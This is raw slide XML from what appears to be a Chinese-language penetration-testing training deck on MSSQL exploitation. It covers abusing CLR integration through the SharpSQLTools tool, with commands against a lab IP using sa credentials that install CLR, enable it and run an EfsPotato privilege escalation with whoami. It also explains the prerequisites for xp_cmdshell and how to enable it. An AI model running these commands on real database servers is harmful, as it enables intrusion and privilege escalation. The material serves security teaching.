              </a:rPr>
              <a:t>Common Language Infrastructure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>），用来支持不同编程语言。</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sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>集成了该组件，可以通过</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sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>编写</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>CLR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>来执行系统命令。</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此处本地新建存储过程相对复杂，直接利用工具</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SharpSQLTools</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>进行实现。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>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SharpSQLTools</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>可实现上传下载文件，</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与</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sp_oacreate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>双回显和</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clr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>加载程序集执行相应操作。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27D6C5DD-85E5-45F5-ACB4-9F24B45E110F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="417337" y="4649249"/>
            <a:ext cx="5199967" cy="1600432"/>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en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>SharpSQLTools.exe 192.168.172.140 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>sa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t> ICQsafe666 master </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>install_clr</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="+mj-cs"/>
              <a:sym typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>SharpSQLTools.exe 192.168.172.140 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>sa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t> ICQsafe666 master </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>enable_clr</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="+mj-cs"/>
              <a:sym typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>SharpSQLTools.exe 192.168.172.140 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>sa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t> ICQsafe666 master </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>clr_efspotato</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>whoami</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="+mj-cs"/>
              <a:sym typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{91FF2248-0CD9-4426-B72C-A0584183A7D4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6829649" y="4433321"/>
            <a:ext cx="4644883" cy="2032288"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39050418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DD2E6D-2A2A-4437-AD96-86366062AD89}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="921572" y="2382235"/>
            <a:ext cx="10577028" cy="4305531"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91419" tIns="45710" rIns="91419" bIns="45710"/>
          <a:lstStyle>
            <a:lvl1pPr eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Lato Light" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" charset="-128"/>
                <a:cs typeface="MS PGothic" panose="020B0600070205080204" charset="-128"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Lato Light" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" charset="-128"/>
                <a:cs typeface="MS PGothic" panose="020B0600070205080204" charset="-128"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Lato Light" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" charset="-128"/>
                <a:cs typeface="MS PGothic" panose="020B0600070205080204" charset="-128"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Lato Light" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" charset="-128"/>
                <a:cs typeface="MS PGothic" panose="020B0600070205080204" charset="-128"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2057400" indent="-228600" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Lato Light" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" charset="-128"/>
                <a:cs typeface="MS PGothic" panose="020B0600070205080204" charset="-128"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="25146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6pPr>
            <a:lvl7pPr marL="29718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7pPr>
            <a:lvl8pPr marL="34290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8pPr>
            <a:lvl9pPr marL="38862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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>xp_cmdshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>利用</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>前提条件：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>当前用户拥有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>DBA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>权限</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="17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700" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>依赖于 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>xplog70.dll</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1700" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>存储过程存在并已启用 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1700" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>xp_cmdshell存储过程</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>可以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1700" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>执行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>系统</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1700" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>命令，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>默认支持</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1700" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>输出</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>执行结果</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1700" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1700" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>从 MSSQL 2005 版本之后默认处于禁用状态，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>可以使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1700" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>sp_configure来启用或禁用 xp_cmdshell。 </a:t>
            </a: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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{794BCE03-8D9E-4CE6-95DA-F6001CBAC070}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="906719" y="1499986"/>
            <a:ext cx="3655121" cy="698268"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8C033"/>
                </a:solidFill>
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>利用总结</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="F8C033"/>
              </a:solidFill>
              <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="矩形 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C4FFFE6-75ED-4B09-BE2A-F6514086A878}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="503038" y="468853"/>
            <a:ext cx="2553904" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0">
                <a:ln w="0"/>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>MSSQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
